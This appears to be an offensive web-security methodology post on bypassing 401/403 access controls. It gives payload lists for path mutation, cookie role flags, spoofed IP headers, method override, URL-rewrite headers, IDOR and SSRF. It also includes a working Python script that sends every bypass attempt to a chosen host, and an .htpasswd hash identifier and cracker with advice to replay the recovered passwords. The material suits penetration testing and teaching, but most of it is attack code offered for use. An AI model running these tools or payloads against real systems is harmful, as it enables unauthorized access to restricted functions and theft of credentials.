# Broken Access Control

Attacking methodology for broken access control in web applications. When a request to a restricted resource returns a 401 or 403, try the bypass techniques collected in this post. Most of them exploit the gap between the component that enforces the access check (a reverse proxy, a WAF, a route rule) and the component that actually serves the resource: if the two parse the request differently, the check can be skipped.

### Manipulate Path <a href="#manipulate-path" id="manipulate-path"></a>

```shellscript
/admin
/Admin
/ADMIN

/./admin
/.;/admin
/;/admin
/admin/
/admin/.

/admin%0d
/admin%0a
/admin%0d%0a

# Append a literal tab character (or several) between the path and the HTTP
# version, not the escape sequence `\t`. Editing the raw request in the
# Burp Suite Proxy/Repeater is the easiest way to do this.
/admin      HTTP/1.1
```

### Change Header Values <a href="#change-header-values" id="change-header-values"></a>

#### Cookie <a href="#cookie" id="cookie"></a>

If the application trusts a role or login flag stored client-side, adding or flipping one in the cookie may grant access to login-required pages. Replacing a session or token value with another user's is the same IDOR idea applied at the session level.

```shellscript
Cookie: admin=true
Cookie: isAdmin=true
Cookie: access=1
Cookie: access=true
Cookie: login=true
Cookie: login=success

# Substitute another user's session or token value
Cookie: session=<another_user_value>
Cookie: access_token=<another_user_value>
```

#### IP Spoofing <a href="#ip-spoofing" id="ip-spoofing"></a>

```shellscript
# Only works when the backend derives the client address from one of these
# headers without a trusted-proxy list. Try each header on its own.
Cluster-Client-IP: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

# Restrictions keyed on the virtual host rather than the client address
Host: 127.0.0.1
```

#### User Agent <a href="#user-agent" id="user-agent"></a>

Some applications route to a different backend or unlock features depending on the User-Agent (an internal tool, a mobile client, a crawler that is allowed past a paywall). Replace it with the value the privileged client sends.

```shellscript
User-Agent: <custom_user_agent>
```

### Change Methods <a href="#change-methods" id="change-methods"></a>

```shellscript
# Try every verb: a rule written for GET may not cover the others, and an
# unknown verb such as INVENTED may fall through to a default handler.
GET, POST, PUT, DELETE, HEAD, TRACE, OPTIONS, PATCH, INVENTED, CONNECT, etc.

# Method override: send `POST /example HTTP/1.1` with one of these headers
# so the framework treats it as PUT, while a front-end filter keyed on the
# verb only sees the POST.
X-Method-Override: PUT
X-HTTP-Method-Override: PUT
```

### POST Parameters <a href="#post-parameters" id="post-parameters"></a>

```shellscript
# Mass assignment: add a privileged field to an otherwise legitimate update
# request and check whether the server binds it to the stored object.
POST / HTTP/1.1
...

{
    "email": "new-email@example.com",
    "isAdmin": true
}
```
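The mass-assignment request above next to the server-side behaviour that makes it work, as an added example (not code from the original page): a profile update that merges whatever the client sent into the stored record, beside one that binds only an allow-list of fields. The stored record, the field names and the `update_profile_*` handlers are assumptions for illustration.

```python
from copy import deepcopy

# Constructed stored record. The application intends only `email` to be
# client-editable; `isAdmin` is server-owned.
STORED_USER = {"username": "michael", "email": "michael@example.com", "isAdmin": False}

# Allow-list of client-editable fields and the type each must have.
EDITABLE_FIELDS = {"email": str}


def update_profile_vulnerable(user, payload):
    """Binds every submitted key: the mass-assignment bug. Equivalent to
    ORM patterns such as `user.update(**request.json)`."""
    user = deepcopy(user)
    user.update(payload)
    return user


def update_profile_safe(user, payload):
    """Allow-list binding. Unknown or privileged fields are rejected rather
    than silently dropped, so a tampered request shows up in logs."""
    unexpected = set(payload) - set(EDITABLE_FIELDS)
    if unexpected:
        raise ValueError(f"rejected fields: {sorted(unexpected)}")
    user = deepcopy(user)
    for field, kind in EDITABLE_FIELDS.items():
        if field not in payload:
            continue
        value = payload[field]
        if not isinstance(value, kind):
            raise ValueError(f"{field}: expected {kind.__name__}, got {type(value).__name__}")
        user[field] = value
    return user


def demo(payload):
    """Run one request body through both handlers.
    Returns (vulnerable_result, safe_result_or_error_message)."""
    vulnerable = update_profile_vulnerable(STORED_USER, payload)
    try:
        safe = update_profile_safe(STORED_USER, payload)
    except ValueError as err:
        safe = str(err)
    return vulnerable, safe


if __name__ == "__main__":
    print(demo({"email": "new-email@example.com", "isAdmin": True}))
```

When testing, send the legitimate update first, then the same body with the extra field, and diff the profile the server returns: a flipped `isAdmin` means the server binds blindly, while a 4xx naming the field means it rejects, and a silent 200 with the flag unchanged means it drops unknown fields (still worth reporting, since a future field will not be covered).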

#### X-Original-URL, X-Rewrite-URL <a href="#x-original-url-x-rewrite-url" id="x-original-url-x-rewrite-url"></a>

```shellscript
# Request an allowed path and name the restricted one in a rewrite header.
# The front end authorises "/", but a backend that honours the header
# routes the request to /admin/deleteuser.
POST / HTTP/1.1
...
X-Original-URL: /admin/deleteuser
# or
X-Rewrite-URL: /admin/deleteuser
...

username=michael
```
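The request-level tricks from the Manipulate Path, Change Header Values, Change Methods and X-Original-URL/X-Rewrite-URL sections above, automated in one script as an added example (not code from the original page). It builds each candidate request by hand over a raw socket so that the literal tab and the `%0d`/`%0a` suffixes reach the wire unchanged (the standard `http.client` refuses control characters in the path), then reports every candidate that does not come back 401/403. The target host, port and path are command-line assumptions; the `sender` parameter exists only so the logic can be exercised without a network.

```python
import socket
import ssl
import sys

# Headers a lax backend may read as the client address; each is sent alone.
TRUST_HEADERS = [
    "Cluster-Client-IP", "Forwarded-For", "X-Forwarded", "X-Forwarded-For",
    "X-Originating-IP", "X-ProxyUser-IP", "X-Remote-Addr", "X-Remote-IP",
]
OVERRIDE_HEADERS = ["X-HTTP-Method-Override", "X-Method-Override"]
REWRITE_HEADERS = ["X-Original-URL", "X-Rewrite-URL"]
METHODS = ["POST", "PUT", "PATCH", "DELETE", "HEAD", "OPTIONS", "TRACE", "INVENTED"]


def path_variants(path):
    """Mutations of `path` that a front-end filter may not match but a
    backend router may still normalise to the original resource."""
    path = "/" + path.strip("/")
    parent, _, last = path.rpartition("/")
    variants = [
        path, path.upper(), f"{parent}/{last.capitalize()}",
        f"{parent}/./{last}", f"{parent}/.;/{last}", f"{parent}/;/{last}",
        f"{path}/", f"{path}/.",
        f"{path}%0d", f"{path}%0a", f"{path}%0d%0a",
        f"{path}\t",  # literal tab between the path and the HTTP version
    ]
    return list(dict.fromkeys(variants))  # drop duplicates, keep order


def build_request(method, path, host, headers=None):
    """Serialise a minimal HTTP/1.1 request without any client-side
    normalisation or validation of the request line."""
    headers = headers or {}
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}", "Connection: close"]
    lines += [f"{name}: {value}" for name, value in headers.items()]
    if method in ("POST", "PUT", "PATCH") and "Content-Length" not in headers:
        lines.append("Content-Length: 0")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def candidates(host, path):
    """Yield (label, raw_request) for every bypass attempt."""
    for p in path_variants(path):
        yield f"GET {p!r}", build_request("GET", p, host)
    for h in TRUST_HEADERS:
        yield f"GET {path} + {h}: 127.0.0.1", build_request("GET", path, host, {h: "127.0.0.1"})
    yield f"GET {path} + Host: 127.0.0.1", build_request("GET", path, "127.0.0.1")
    for m in METHODS:
        yield f"{m} {path}", build_request(m, path, host)
    for h in OVERRIDE_HEADERS:
        yield f"POST {path} + {h}: GET", build_request("POST", path, host, {h: "GET"})
    for h in REWRITE_HEADERS:
        yield f"GET / + {h}: {path}", build_request("GET", "/", host, {h: path})


def parse_status(raw):
    """Status code from a raw response, or -1 if no status line came back."""
    line = raw.split(b"\r\n", 1)[0].split()
    return int(line[1]) if len(line) > 1 and line[1].isdigit() else -1


def send_raw(host, port, data, use_tls, timeout=5.0):
    """Send one raw request and return the response status code."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(data)
        chunks = []
        while True:
            buf = sock.recv(4096)
            if not buf:
                break
            chunks.append(buf)
    return parse_status(b"".join(chunks))


def hunt(host, port, path, use_tls=False, sender=send_raw):
    """Try every candidate; return (status, label) for those not answered
    with 401/403. Review the hits by hand: 404/400 are usually noise."""
    hits = []
    for label, req in candidates(host, path):
        status = sender(host, port, req, use_tls)
        print(f"{status:>4}  {label}")
        if status not in (401, 403):
            hits.append((status, label))
    return hits


if __name__ == "__main__":
    # usage: python3 bypass403.py target.example 443 /admin --tls
    target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    for status, label in hunt(target, port, path, use_tls="--tls" in sys.argv):
        print(f"[+] {status} {label}")
```

Run the original request once first to learn the baseline status, then treat any 2xx/3xx hit as a lead to confirm manually in Burp: a 200 on a path variant means the proxy and backend disagree on normalisation, a 200 only with a rewrite header means the backend routes on that header, and a change only with a trust header means the backend believes client-supplied addresses.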

### GET Parameters <a href="#get-parameters" id="get-parameters"></a>

```shellscript
https://vulnerable.com/account?id=michael
https://vulnerable.com/account?id=admin
https://vulnerable.com/account?id=administrator

# A GUID cannot be brute-forced, but other users' GUIDs often leak elsewhere on the site (profile pages, API responses, comments, exports).
https://vulnerable.com/account?id=7230b2a9-60de-4409-a350-cd14986a8d3e
https://vulnerable.com/account?id=1de655cb-29d7-4008-b434-e688b39f9564
```

### Access Page via SSRF <a href="#access-page-via-ssrf" id="access-page-via-ssrf"></a>

If another website owned by the same organization has an SSRF (a parameter that makes the server fetch a user-supplied URL), that server may sit inside the network perimeter or on an allow-listed IP, so it can fetch the restricted page on our behalf.

```shellscript
https://example.com?url=https://admin.example.com/
```

### Read `.htpasswd` <a href="#read-htpasswd" id="read-htpasswd"></a>

If the target is protected with HTTP Basic authentication (a 401 response carrying a **WWW-Authenticate** header), the credential file `.htpasswd` may be readable if it was placed in the web root. Apache's default configuration denies requests for files beginning with `.ht`, so a direct read only works when that rule is missing or the file is served by a different server (for example nginx); otherwise a path-traversal or file-read bug elsewhere may still expose it. The file holds hashed passwords that can be cracked offline.
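What to do with a recovered `.htpasswd`, as an added example (not code from the original page): parse the `user:hash` lines, identify the hash scheme from its prefix, crack the `{SHA}` entries (plain base64 SHA-1) against a wordlist inline, and point the `$apr1$`, bcrypt and crypt(3) entries at the offline cracker modes they need. The sample file and wordlist are constructed; only alice's entry is a real hash (of the password `password`), the other hashes are format-valid placeholders.

```python
import base64
import hashlib
import re

# Constructed sample file. alice: real {SHA} hash of "password". bob, carol
# and dave: format-valid placeholders, not real hashes, to exercise detection.
HTPASSWD = """\
# users for /admin
alice:{SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=
bob:$apr1$Zm9vYmFy$AAAAAAAAAAAAAAAAAAAAA/
carol:$2y$05$AAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
dave:ab/cd.EF12gh3
"""

# Constructed wordlist; in practice point this at rockyou or a site-specific list.
WORDLIST = ["123456", "admin", "letmein", "password", "Password1"]

# (scheme name, recogniser, offline tool hint) in the order they are tried.
SCHEMES = [
    ("apr1",   re.compile(r"^\$apr1\$"),            "hashcat -m 1600 / john --format=md5crypt"),
    ("bcrypt", re.compile(r"^\$2[aby]\$"),          "hashcat -m 3200 / john --format=bcrypt"),
    ("sha1",   re.compile(r"^\{SHA\}"),             "cracked inline; hashcat -m 101"),
    ("crypt",  re.compile(r"^[./0-9A-Za-z]{13}$"),  "hashcat -m 1500 / john --format=descrypt"),
]


def parse_htpasswd(text):
    """Return [(user, hash)] for the non-empty, non-comment lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, digest = line.partition(":")
        entries.append((user, digest))
    return entries


def identify(digest):
    """Return (scheme, tool hint); ("unknown", "") if no recogniser matches."""
    for name, pattern, tool in SCHEMES:
        if pattern.search(digest):
            return name, tool
    return "unknown", ""


def sha1_htpasswd(password):
    """The {SHA} scheme: unsalted SHA-1 of the password, base64-encoded."""
    return "{SHA}" + base64.b64encode(hashlib.sha1(password.encode()).digest()).decode()


def crack_sha1(digest, wordlist):
    """Dictionary attack on one {SHA} entry; None if no word matches."""
    for word in wordlist:
        if sha1_htpasswd(word) == digest:
            return word
    return None


def audit(text, wordlist):
    """Map user -> (scheme, recovered password or None, tool hint)."""
    results = {}
    for user, digest in parse_htpasswd(text):
        scheme, tool = identify(digest)
        found = crack_sha1(digest, wordlist) if scheme == "sha1" else None
        results[user] = (scheme, found, tool)
    return results


if __name__ == "__main__":
    for user, (scheme, found, tool) in audit(HTPASSWD, WORDLIST).items():
        print(f"{user:8} {scheme:8} {found or '-':12} {tool}")
```

The `{SHA}` scheme is unsalted, so a single hash computation per candidate word covers every user with that scheme at once; the salted schemes are left to hashcat or john, whose mode numbers are given in the hints. Once a password is recovered, replay it with `Authorization: Basic base64(user:password)` against the original 401.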
